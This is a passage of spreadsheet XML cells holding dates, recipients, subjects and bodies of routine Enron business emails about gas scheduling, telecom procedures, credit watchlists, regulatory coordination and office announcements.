ded to me today and indicated that a final answer cannot be given until ear=_x000D_
ly next week because the VP over major accounts is out of the office.  She =_x000D_
indicated that her peole said that ISU never used on-site generation for pe=_x000D_
ak shaving purposesand instead used them only for back-up, hence no standby=_x000D_
 service was required previously.  I told her that that was not accurate an=_x000D_
d that this is a new and unwarranted change in requirements that is not sup=_x000D_
ported by IP's tariffs.  I also informed her that the units are electricall=_x000D_
y isolated from IP's system through a make-and-break switch system and coul=_x000D_
d obviously not be served by two power sources. Further, since ISU has abou=_x000D_
t 25 of these small units scattered around its campus in Normal, Illinois, =_x000D_
the likelihood that a significant percentage of these units would fail and =_x000D_
require IP to standby is virtually zero.  I also told her that she was in t=_x000D_
he middle of this and that I did not believe that she was getting the full =_x000D_
story from her people but that I was not interested in playing a blame game=_x000D_
, but rather wish to avoid an unnecessary confrontation that serves nobody.=_x000D_
  She agreed and indicated that she would call me Tuesday, July 3 and give =_x000D_
me IP's position.  I have positioned this as a misunderstanding on the part=_x000D_
 of IP's account representative.</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 16:06:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Net Works and Enron Global Strategic Sourcing announce new_x000D_
 procedure for using 800-97-Enron telephone number</t>
  </si>
  <si>
    <t xml:space="preserve">As you know, Enron Net Works (ENW) and Enron Global Strategic Sourcing (GSS) recently executed a two-year agreement, whereby MCI WorldCom would serve as Enron's primary telecommunications provider.  In our previous communication, we indicated that we would provide you with more detailed information as it became available._x000D_
_x000D_
Beginning Friday, October 26, 2001 at 9 a.m. C.S.T, the procedure for calling Enron's Houston offices from international locations, excluding Canada, using the 800-97-Enron phone number will change.  The new procedure is as follows: _x000D_
_x000D_
1.	Please dial the WorldPhone International Access number for the country where you are located (country access code), which is available on the attached wallet card, accessible through the following link:  http://home.enron.com:84/messaging/mciannouncement.doc.    _x000D_
2.	You will then be prompted for your PIN number.  Since calling cards and pin numbers are not required to use this service, all users should respond by dialing 1-800-97-ENRON or 1-800-973-6766. _x000D_
3.	You will then be asked to enter your destination.  Please dial 0-800-97-Enron (800-973-6766) to reach Enron's corporate offices in Houston._x000D_
  _x000D_
This procedure can only be used to call 800-97-Enron from WorldPhone International locations.  If you are calling from the U. S. or Canada, please continue to dial 1-800-97-ENRON._x000D_
  _x000D_
If you have questions regarding commercial aspects of this agreement, please feel free to contact Tom Moore, GSS senior contract manager at 713-345-5552.  For technical issues, please contact Hasan Imam, ENW IT manager at 713-345-8525.   _x000D_
 </t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 06:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'phillip.allen@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t>"Pease Brothers"</t>
  </si>
  <si>
    <t>Launch.</t>
  </si>
  <si>
    <t>Mon, 10 Apr 2000 00:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'colleen.sullivan@enron.com', 'joan.veselack@enron.com'})</t>
  </si>
  <si>
    <t>Re: CES contract - Choice Demand Swings in April 2000 - PLEASE READ</t>
  </si>
  <si>
    <t xml:space="preserve">When CES runs out of transport and takes more than their "their first of the _x000D_
month" volume on any given day, the price is GD App + $.06 + FT variable _x000D_
cost.  This works real well with Scott's $.05 IT discount.   _x000D_
_x000D_
What I don't know about is the Aristech capacity, does that belong to CES or _x000D_
ENA for May?  I apologize upfront if someone has already responded._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joan Veselack@ENRON_x000D_
04/09/2000 06:34 PM_x000D_
To: Colleen Sullivan/HOU/ECT@ECT_x000D_
cc: Chris Germany/HOU/ECT@ECT, Molly Johnson/HOU/ECT@ECT, Dick _x000D_
Jenkins/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT, Joann Collins/Corp/Enron@ENRON, Robert _x000D_
Allwein/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT _x000D_
Subject: CES contract - Choice Demand Swings in April 2000 - PLEASE READ_x000D_
_x000D_
Colleen need your help with this one. Choice is having huge temperature _x000D_
swings causing drastic demand changes. Also, the new Choice SST contract mdq _x000D_
was reduced from 134,000 to 54,000 in April. There are several cold days that _x000D_
are causing ENA to service Choice via IT ($0.05/dkt) and Contract Overruns _x000D_
($0.21/dkt)._x000D_
Do these charges get passed back to CES?_x000D_
_x000D_
The TCO schedulers are trying to be proactive, by looking at Intraday Temps. _x000D_
Unfortunately, we are having a hard time estimating the actual burn. The CDC _x000D_
posts a forecast, one day before gas flow. CDC does not post intraday temps, _x000D_
we look at the National Weather Service. CDC only posts actuals, once the gas _x000D_
day is ended. Once the gas day is ended, TCO and CDC only allow adjustments _x000D_
on the SST contract as a no-notice storage withdrawal adjustment. Because the _x000D_
burns are increasing during the cold periods, we are overrunning the _x000D_
contracts._x000D_
_x000D_
Just want to ensure everyone is on the same page before ENA receives TCO's _x000D_
April bill, and CES receives ENA's April bill. I have not discussed this with _x000D_
CES yet, wanted to ensure ENA is on the same page._x000D_
_x000D_
So far this month:_x000D_
_x000D_
4/4 IT = 25,589 Overrun = 6000_x000D_
4/8 IT = 22,226 Overrun = 8000_x000D_
4/9 IT = 12,404 Overrun = waiting on actuals_x000D_
4/10 IT = 8,200 Overrun = waiting on actuals_x000D_
_x000D_
Accumulated Estimated Cost_x000D_
_x000D_
IT = $3421 Overrun = $2940_x000D_
_x000D_
There was another suggestion to use the Idle transport for Hopewell and Calp. _x000D_
At this time, I strongly advise not using the swing transport. If Hopewell _x000D_
and Calp come up... it is usually late intraday... and does not give us _x000D_
enough time to switch the transport with the CDC's. The penalty for Choice _x000D_
gas not showing up is $25/dkt and getting kicked out of the Choice program. _x000D_
The CDC's do not accept retro's for Choice gas. Believe me... I have tried _x000D_
several times!!!! Usually CES has enough behind the citygate pool gas to help _x000D_
balance for minor differences (under 100 dkt). Also, TCO is not as friendly _x000D_
as they used to be in doing retro's for Choice gas._x000D_
_x000D_
Thank you for your help._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Feb 2002 08:17:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chairman.ets@enron.com'})</t>
  </si>
  <si>
    <t>It is with sincere sadness that I inform you of a tragedy that occurred.  Doug Hammer, an Enron Northern Natural Gas senior operations and maintenance technician located at the LNG facility in Wrenshall, Minnesota, died earlier this week.  Doug gave many years of dedicated service to EOTT and most recently Northern Natural Gas.  Our thoughts and prayers are with Doug's family._x000D_
 _x000D_
Recognizing this is a difficult time for us all, the Enron Employee Assistance Program is available 24 hours a day, seven days a week.  Please call 713.853.6057, or 1.800.345.1391 for assistance.  _x000D_
_x000D_
Additional information about the program is also available via the Enron intranet site at: &lt;http://hrweb.enron.com/employeeServices/workLife/resourcesReferrals.asp&gt;_x000D_
_x000D_
Stan</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 02:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NYMX now at 5.155 by 5.165, YOU MADE ME STRONG - out at 5.265</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 07:36:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>Kraft Foods(KFT) Initial Public Offering-Formerly Part of the Phi_x000D_
	llip Morris Company(MO)</t>
  </si>
  <si>
    <t>_x000D_
Kraft (KFT) IPO_x000D_
_x000D_
On Tuesday, June12, they will be pricing the IPO for Kraft(KFT)-formerly_x000D_
part of the Phillip Morris Company(MO). Price talk is in the 27-30 range._x000D_
The IPO has been oversubscribed-indicating that there is a great deal of_x000D_
interest in KFT(formerly the non-tobacco part of the Phillip Morris_x000D_
Company). If you would be interested in hearing more about the Kraft(KFT)_x000D_
IPO, please call us at 713-957-7060, or reply to this_x000D_
e-mail(henry.emery@ubspainewebber.com)._x000D_
_x000D_
Sincerely,_x000D_
Hank Emery_x000D_
UBS PaineWebber_x000D_
Emery Financial Group_x000D_
_x000D_
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 of_x000D_
all e-mail communications sent and/or received by its employees.</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 09:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hal.mckinney@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kam.keiser@enron.com', 'phillip.love@enron.com', 'jeffrey.gossett@enron.com', "o'neal.winfree@enron.com", 'shirley.mcdowell@enron.com', 'darron.giron@enron.com'})</t>
  </si>
  <si>
    <t>Contact Information...</t>
  </si>
  <si>
    <t>Hal McKinney_x000D_
location:  2510a_x000D_
work:   (713)345-3707_x000D_
pager:   (713)288-3577_x000D_
_x000D_
_x000D_
I will be out of the office Friday 5/11/2001 and will be accessible by pager._x000D_
_x000D_
Thanks_x000D_
_x000D_
Hal_x000D_
x53707</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 10:12:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'fred.lagrasta@enron.com'})</t>
  </si>
  <si>
    <t>Nobel Gas Marketing</t>
  </si>
  <si>
    <t>We still haven't got this finalized - I'm  looking to do this this week otherwise I would have to start agreeing with Bill that we have to pull them._x000D_
_x000D_
Louise Kitchen_x000D_
Chief Operating Officer_x000D_
Enron Americas_x000D_
Tel:  713 853 3488_x000D_
Fax: 713 646 2308</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 01:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jim.schwieger@enron.com', 'susan.smith@enron.com', 'paul.choi@enron.com', 'steve.schneider@enron.com', 'kate.fraser@enron.com', 'souad.mahmassani@enron.com', 'james.barker@enron.com', 'sharon.hausinger@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'sylvia.pollan@enron.com', 'brad.coleman@enron.com', 'joseph.graham@enron.com', 'bill.kyle@enron.com', 'brad.mckay@enron.com', 'justin.rostant@enron.com', 'richard.deming@enron.com', 'dan.mccairns@enron.com', 'lisa.csikos@enron.com', 'kristen.hanson@enron.com', 'jack.simunek@enron.com', 'ron.green@enron.com', 'larry.hunter@enron.com', 'joanne.harris@enron.com', 'melissa.graves@enron.com', 'brad.horn@enron.com', 'shonnie.daniel@enron.com', 'tom.moran@enron.com', 'bryce.baxter@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susan.pereira@enron.com', 'andrew.greer@enron.com', 'debbie.brackett@enron.com', 'christina.bangle@enron.com', 'thomas.martin@enron.com', 'jane.tholt@enron.com', 'recipients@enron.com', 'mary.smith@enron.com', 'steven.south@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'amanda.boettcher@enron.com', 'lester.rawson@enron.com', 'mary.cook@enron.com', 'nicole.cortez@enron.com', 'marde.driscoll@enron.com', 'lucy.ortiz@enron.com', 'christy.sweeney@enron.com', 'sandi.braband@enron.com', 'ellen.wallumrod@enron.com', 'andrew.lewis@enron.com', 'kathryn.bussell@enron.com', 'julie.gomez@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'zarin.imam@enron.com', 'daniel.salinas@enron.com', 'edward.baughman@enron.com', 'geoff.storey@enron.com', 'gerald.lofton@enron.com', 'lauri.allen@enron.com', 'ned.higgins@enron.com', 'kim.theriot@enron.com', 'homer.lin@enron.com', 'teresa.seibel@enron.com', 'russell.diamond@enron.com', 'michael.etringer@enron.com', 'andrea.ring@enron.com', 'jefferson.sorenson@enron.com', 'cheryl.marshall@enron.com', 'barbara.gray@enron.com', 'berney.aucoin@enron.com', 'craig.breslau@enron.com', 'gary.bryan@enron.com', 'lisa.valderrama@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david.parquet@enron.com', 'george.smith@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'steve.hooser@enron.com', 'lisa.gillette@enron.com', 'peter.keavey@enron.com', 'tammi.depaolis@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'teresa.mandola@enron.com', 'derek.bailey@enron.com', 'joanie.ngo@enron.com', 'jake.thomas@enron.com', 'david.eubanks@enron.com', 'patrick.hanse@enron.com', 'dick.jenkins@enron.com', 'lance.halgren@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'donald.black@enron.com', 'janet.dietrich@enron.com', 'katherine.herrera@enron.com', 'keith.holst@enron.com', 'george.gilbert@enron.com', 'kenneth.kaase@enron.com', 'peggy.banczak@enron.com', 'bryan.hull@enron.com', 'paul.tate@enron.com', 'bernard.dahanayake@enron.com', 'angie.collins@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timothy.hamilton@enron.com', 'alain.diza@enron.com', 'daniel.reck@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'bo.petersen@enron.com', 'josephine.logan@enron.com', 'vladimir.gorny@enron.com', 'janie.aguayo@enron.com', 'mike.miller@enron.com', 'greg.mcclendon@enron.com', 'sheila.glover@enron.com', 'stuart.staley@enron.com', 'sunil.dalal@enron.com', 'jeff.coates@enron.com', 'kyle.lilly@enron.com', 'lisa.lees@enron.com', 'rhonda.smith@enron.com', 'andrea.hauser@enron.com', 'stephanie.sever@enron.com', 'cindy.vachuska@enron.com', 'ann.white@enron.com', 'jay.blaine@enron.com', 'suzy.robey@enron.com', 'kimberly.olinger@enron.com', 'adam.gross@enron.com', 'dennis.benevides@enron.com', 'elizabeth.sager@enron.com', 'fred.lagrasta@enron.com', 'james.shirley@enron.com', 'morgan.babin@enron.com', 'winston.cheng@enron.com', 'john.grass@enron.com', 'tim.weithman@enron.com', 'tom.donohoe@enron.com', 'george.hope@enron.com', 'paul.lucci@enron.com', 'monica.roberts@enron.com', 'jung-suk.suh@enron.com', 'candace.bywaters@enron.com', 'jesus.guerra@enron.com', 'kelly.lovvorn@enron.com', 'tana.jones@enron.com', 'ragan.bond@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', 'carol.clair@enron.com', 'maureen.smith@enron.com', 'leslie.reeves@enron.com', 'jennifer.blay@enron.com', 'audrey.cook@enron.com', 'greg.wolfe@enron.com', 'edward.gottlob@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Revised Credit Watchlist--3/7/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised Credit Watch listing for the week of 3/5/01.  Please _x000D_
note that PG&amp;E Energy Trading-Gas Corp. is back on the Watchlist for "NO _x000D_
TRADES".  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t>
  </si>
  <si>
    <t>Wed, 5 Sep 2001 07:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.shapiro@enron.com', 'd..steffes@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>FW: Regulatory Updates - General Updates</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Tycholiz, Barry  _x000D_
Sent:	Tuesday, September 04, 2001 12:34 PM_x000D_
To:	Tholt, Jane M.; Miller, Stephanie; Dasovich, Jeff_x000D_
Cc:	Grigsby, Mike_x000D_
Subject:	Regulatory Updates - General Updates_x000D_
_x000D_
Stephanie and I met with Jeff Dasovich in San Fransisco on Friday.  Jeff understands that he can play an important/strategic role in assisting ENA West Gas in understanding the regulated issues for Gas... There is no doubt that ENA has spent most of our resources in power ( and for good reason) however we need to re focus energy on gas related structures. _x000D_
_x000D_
To facilitate this effort, Jeff has offered to focus some more of his time and effort on coordinating some of the key commercial issues related to California.  Jane and Stephanie need to create a priority list that represents West Gas issues and "Hot Button" or action items. Once created we can work with Jeff on action items.  In addition to this immediate need, Jeff will join our conference call's/meetings ( or attend where possible).  The next session I have on my calendar is Thurs Sept 5 @ 2:30.  _x000D_
_x000D_
I trust this initiative will further enhance an already effective procedure. If there are any questions, let me know._x000D_
_x000D_
regards, _x000D_
_x000D_
Barry Tycholiz  </t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 07:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bbb@debt-masters.com'})</t>
  </si>
  <si>
    <t>?_x000D_
Regards,_x000D_
Ben Bedell_x000D_
ESBIN &amp; BEDELL, LLP_x000D_
495 South Main St._x000D_
New City, New York 10956_x000D_
Phone: 845-634-7909 _x000D_
Fax: 845-634-4160_x000D_
?_x000D_
_x000D_
_x000D_
The information contained in this electronic message is confidential and  _x000D_
intended only for the use of the individual or entity named above. If the _x000D_
reader  of this message is not the intended recipient, or the employee or _x000D_
agent  responsible to deliver it to the intended recipient, you are hereby _x000D_
notified  that any dissemination, distribution, or copying of this _x000D_
communication is  strictly prohibited. If you have received this _x000D_
communication in error, please  immediately notify us by telephone at?845-_x000D_
634-7909 or by e-mail at bbb@debt-masters.com._x000D_
_x000D_
The information contained in this electronic mail message is privileged and  _x000D_
confidential and is or may be protected by the attorney- client privilege, _x000D_
the  work product doctrine, joint defense privileges, trade secret _x000D_
protections,  and/or other applicable protections from disclosure. The sender _x000D_
of this  electronic mail message intends to preserve the confidentiality of _x000D_
the enclosed  information and does not waive any applicable privilege or _x000D_
protection from  disclosure. Thank you._x000D_
_x000D_
?_x000D_
?_x000D_
 - 224-86.Funding Memo.xls</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 07:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vernesia.a.gipson@dynegy.com'})</t>
  </si>
  <si>
    <t>Dynegydirect Update</t>
  </si>
  <si>
    <t>Dear Dynegydirect Customer:_x000D_
_x000D_
Dynegydirect is now available.  You may log back on at your earliest_x000D_
convience._x000D_
_x000D_
We appreciate your patience._x000D_
_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
DYNEGYdirect e- care_x000D_
Customer Support_x000D_
Dynegy, Inc._x000D_
Ph: (877) 396.3493   Fx: (877) 396.3492_x000D_
Email: ecare@dynegydirect.com</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 07:25:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'deanrodgers@kaseco.com'})</t>
  </si>
  <si>
    <t>Technical Analysis Class, Early Bird 'Til 11/05</t>
  </si>
  <si>
    <t xml:space="preserve">Learn Technical Analysis_x000D_
Two Full Days, December 4-5, 2001 _x000D_
Early Bird Discount Until October 31, 2001_x000D_
  &lt;http://www.kaseco.com/images/tech_exten.gif&gt;_x000D_
Marriott West Loop, Houston, Texas _x000D_
_x000D_
Energy Traders, Marketers and Buyers. _x000D_
_x000D_
This two full day class serves as both an introduction to those new to technical analysis and a refresher for experienced traders. Technicals are taught in a logical, systematic manner oriented to equip both physical and paper traders to buy low, sell high and manage risk in the real world in a logical, methodical manner.   _x000D_
_x000D_
 _x000D_
_x000D_
In this class you will:_x000D_
_x000D_
Ascertain when and how to take profit and cut losses._x000D_
Find out how to set up a strategy by identifying probable market direction and turns as well as likely targets using chart patterns._x000D_
Learn to use both traditional indicators like moving averages and stochastics, as well the state-of-the-art methods which won Cynthia Kase the coveted Market Technicians Association's "Best of the Best" award._x000D_
_x000D_
Content_x000D_
_x000D_
Charting Basics, Types of Charts, Support and Resistance_x000D_
When to Buy or Sell (Entry Techniques)_x000D_
When to Exit Based on Signals (Momentum and Divergence)_x000D_
How to Exit Based on Stops (Managing Trade Risk)_x000D_
Chart Patterns and Forecasting Basics (Candlesticks, Elliott  Wave, Flags, etc.)_x000D_
Statistical Hedging_x000D_
_x000D_
Early Bird Special $845.00_x000D_
Two or More Early Bird $795.00_x000D_
Regular: $995.00_x000D_
Two or More: $895.00	 *** Register Now! *** &lt;http://www.kaseco.com/classes/register/register_choice.htm&gt;_x000D_
_x000D_
 _x000D_
_x000D_
Click Here for More Information &lt;http://www.kaseco.com/classes/tech_analysis.htm&gt;_x000D_
_x000D_
About the Presenters &lt;http://www.kaseco.com/classes/tech_presenters.htm&gt;_x000D_
_x000D_
Who Should Attend &lt;http://www.kaseco.com/classes/tech_attend.htm&gt;_x000D_
Detailed Agenda and Schedule &lt;http://www.kaseco.com/classes/tech_outline.htm&gt;_x000D_
Other Classes Offered By Kase &lt;http://www.kaseco.com/classes/classes.htm&gt;   _x000D_
  &lt;http://www.kaseco.com/images/house_blue.gif&gt;	Kase and Company also offers In House Training Classes. For more information please email us at kase@kaseco.com &lt;mailto:kase@kaseco.com&gt; or call at (505) 237-1600	 </t>
  </si>
  <si>
    <t>Tue, 21 Aug 2001 15:30:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kal.shah@enron.com'})</t>
  </si>
  <si>
    <t>FW: US West Power Pop-up Announcement</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shah, Kal  _x000D_
Sent:	Tuesday, August 21, 2001 11:16 AM_x000D_
To:	Williams, Bill_x000D_
Subject:	US West Power Pop-up Announcement_x000D_
_x000D_
_x000D_
[Bill - would you please take a look at the text below and fill in the needed information.  Please let me know if we've left anything out. When we've got all the info., we will run it by legal and post on the web site.] _x000D_
_x000D_
_x000D_
Text for new pop-up (to run next Monday-Tuesday, August 27-28):_x000D_
_x000D_
Hourly Products for US West Physical Power Now Available_x000D_
_x000D_
EnronOnline has introduced new hourly products to help you manage short-term risk in the US West Physical Power market._x000D_
_x000D_
The following delivery points are currently available: [list delivery points]_x000D_
These products will trade from xx:xx to xx:xx [time zone], [days of week]._x000D_
_x000D_
Please take a few minutes to review the product long descriptions before transacting these products. _x000D_
_x000D_
For more information, please click here [open new browser window and link to http://www.enrononline.com/docs/marketing/ContactEnronOnline/].</t>
  </si>
  <si>
    <t>Thu, 16 Mar 2000 07:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mike Jakubik EB 3324 RE: Introduce Lisa Bills, New Director In His_x000D_
 Group</t>
  </si>
  <si>
    <t>Set up with Nicole Mayer 31847 3/13/00</t>
  </si>
  <si>
    <t>Tue, 26 Aug 1997 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Project Power Play meeting, in Causey's office, EB 5015.  With_x000D_
 Rick Causey, Kathleen Magruder, Jordan Mintz, Bob Hermann</t>
  </si>
  <si>
    <t>_x000D_
Per Bobbie Moody, x35955</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 10:50:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.lowry@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'group.dl-ets@enron.com'})</t>
  </si>
  <si>
    <t>Model Office Migration completed last night</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The following items were migrated to Model Office last night:_x000D_
_x000D_
Pam_x000D_
Validation on NNG Firm Agreements.  Provides a warning to online and EDI customers when delivery or receipt location is not included on the contract's list of primary points valid for transport._x000D_
_x000D_
Jennifer_x000D_
Update the ServerCodeManagerView to pull Model Office and Production directories dynamically.  Also, add DRA servers and create a way to copy files to the port directories as well as their change set directories.  IT testing only._x000D_
_x000D_
Jill_x000D_
Abilty to have group names after the numbers for TW on the path detective_x000D_
CMS Security Interface chgs requested by Hendra_x000D_
Changing security back to SQL2K_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 08:49:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kcarter@simmonsco-intl.com'})</t>
  </si>
  <si>
    <t>RE: thurs</t>
  </si>
  <si>
    <t xml:space="preserve">how far from Houston?_x000D_
_x000D_
-----Original Message-----_x000D_
From: KCarter@simmonsco-intl.com [mailto:KCarter@simmonsco-intl.com]_x000D_
Sent: Friday, November 16, 2001 10:44 AM_x000D_
To: Taylor, Michael E_x000D_
Subject: RE: thurs_x000D_
_x000D_
_x000D_
_x000D_
yes it is the one that likes you.  it is one and a half hours from my_x000D_
parents house_x000D_
_x000D_
Kerry E. Carter_x000D_
Analyst_x000D_
Simmons &amp; Company International_x000D_
(713) 236-9999_x000D_
_x000D_
_x000D_
                                                                                                 _x000D_
                    "Taylor, Michael                                                             _x000D_
                    E"                        To:     &lt;KCarter@simmonsco-intl.com&gt;               _x000D_
                    &lt;Michael.E.Taylor@        cc:                                                _x000D_
                    ENRON.com&gt;                Subject:     RE: thurs                             _x000D_
                                                                                                 _x000D_
                    11/16/01 10:44 AM                                                            _x000D_
                                                                                                 _x000D_
                                                                                                 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
how far is your dad's family house?  Is that the one that likes me?_x000D_
_x000D_
-----Original Message-----_x000D_
From: KCarter@simmonsco-intl.com [mailto:KCarter@simmonsco-intl.com]_x000D_
Sent: Friday, November 16, 2001 10:31 AM_x000D_
To: Taylor, Michael E_x000D_
Subject: Re: thurs_x000D_
_x000D_
_x000D_
_x000D_
yes,_x000D_
_x000D_
one on thurs. with my mom's family at my parents house and one on sat._x000D_
with_x000D_
my dad's family at his parents house_x000D_
_x000D_
Kerry E. Carter_x000D_
Analyst_x000D_
Simmons &amp; Company International_x000D_
(713) 236-9999_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Taylor, Michael_x000D_
_x000D_
                    E"                        To:     "Kerry Carter_x000D_
(E-mail)"_x000D_
                    &lt;Michael.E.Taylor@_x000D_
&lt;KCarter@simmonsco-intl.com&gt;_x000D_
                    ENRON.com&gt;                cc:_x000D_
_x000D_
                                              Subject:     thurs_x000D_
_x000D_
                    11/16/01 10:26 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerry,_x000D_
_x000D_
Are you having two thanksgivings with your family?_x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
and may contain confidential and privileged material for the sole use of_x000D_
the intended recipient (s). Any review, use, distribution or disclosure_x000D_
by_x000D_
others is strictly prohibited. If you are not the intended recipient (or_x000D_
authorized to receive for the recipient), please contact the sender or_x000D_
reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
delete_x000D_
all copies of the message. This e-mail (and any attachments hereto) are_x000D_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_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Apr 2000 09:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 04/27/2000 04:41 _x000D_
PM ---------------------------_x000D_
_x000D_
	  Enron In Action	 Week of 04.24.00_x000D_
_x000D_
From: Enron In Action@ENRON on 04/24/2000 08:36 AM_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: All Enron Houston_x000D_
cc:  _x000D_
Subject: Enron In Action 4.24.00_x000D_
_x000D_
IVOLUNTEERI  _x000D_
Join U of H legend and former Houston Rocket Clyde Drexler for the 9th Annual _x000D_
Epilepsy Summer Stroll at  Terry Hershey Park Saturday, May 13th.  We are _x000D_
looking for team captains and walkers.  For more details, please contact _x000D_
Sherri Saunders at 3-6107 or Stephanie Nikolis at 3-1967._x000D_
_x000D_
IHAPPENINGSI  _x000D_
Aeros Playoff Hockey Tickets- The Houston Aeros will begin their defense of _x000D_
the Turner Cup April 29th at Compaq Center.  Enron Employees can purchase _x000D_
discounted tickets in advance in the Enron Building lobby on Wednesday, April _x000D_
26th from 11 AM - 1 PM.  You can also go to the Community Relations website _x000D_
for an order form-http://home.enron.com/cr/.  Any questions, call the Houston _x000D_
Aeros at (713) 361-7937._x000D_
_x000D_
Get into the spring of things with the blooming plant sale in the Enron Lobby _x000D_
Wed., April 26th from 11:00 a.m. - 1:00 p.m. _x000D_
 _x000D_
Enron Spring Volleyball Tournament 2000 is scheduled for May 13th at 9:00 _x000D_
a.m.   For more information contact Jodi Dziadek at x34301._x000D_
_x000D_
Get CPR/First Aid Certified this month!  Learn the lifesaving techniques for _x000D_
you and your family.  Learn how to perform adult &amp; infant CPR and how to use _x000D_
an AED (automatic external defibrillator).  April 25, 1:00 - 5:00 p.m.  Cost _x000D_
is $10.  To register call the Health Center at x36100. _x000D_
_x000D_
Enron Company Picnic Astroworld tickets can only be used on the day of the _x000D_
picnic - May 7, 2000. If any questions or still need to buy tickets, please _x000D_
contact Rachel at X57629. _x000D_
_x000D_
IWORKPERKSI_x000D_
 Enron has a free shuttle service to parking garages, surface lots, and Metro _x000D_
bus stops in the immediate downtown area.  Route maps and time information _x000D_
are available at the Transportation Desk on Level 3 of the Enron Building.  _x000D_
The program will soon be evaluated  for improvements.  Your comments and _x000D_
suggestions are welcome.  Comment cards are available on the shuttle and at _x000D_
the Transportation Desk._x000D_
_x000D_
ISAVE THE DATEI_x000D_
May 6th -  Kremlin Gold Collection at the Museum of Natural Science, dontate _x000D_
a new or gently used book and receive a discount on admission plus a free _x000D_
pass to the IMAX film "Gold Fever"._x000D_
June 9th - Bring Your Child To Work Day.  </t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 04:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Execution copies - Enron PrimeTrade Agreement</t>
  </si>
  <si>
    <t>----- Forwarded by Sara Shackleton/HOU/ECT on 09/18/2000 11:16 AM -----_x000D_
_x000D_
	"Didier, Jacqueline" &lt;jacqueline.didier@csfb.com&gt;_x000D_
	09/15/2000 04:58 PM_x000D_
		 _x000D_
		 To: "'sara.shackleton@enron.com'" &lt;sara.shackleton@enron.com&gt;_x000D_
		 cc: "De Dalmas, Guillaume" &lt;guillaume.dedalmas@csfb.com&gt;_x000D_
		 Subject: Execution copies - Enron PrimeTrade Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[INFO] -- Content Manager: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_x000D_
all_x000D_
copies of it from your system, destroy any hard copies of it and notify_x000D_
the_x000D_
sender.  You must not, directly or indirectly, use, disclose,_x000D_
distribute,_x000D_
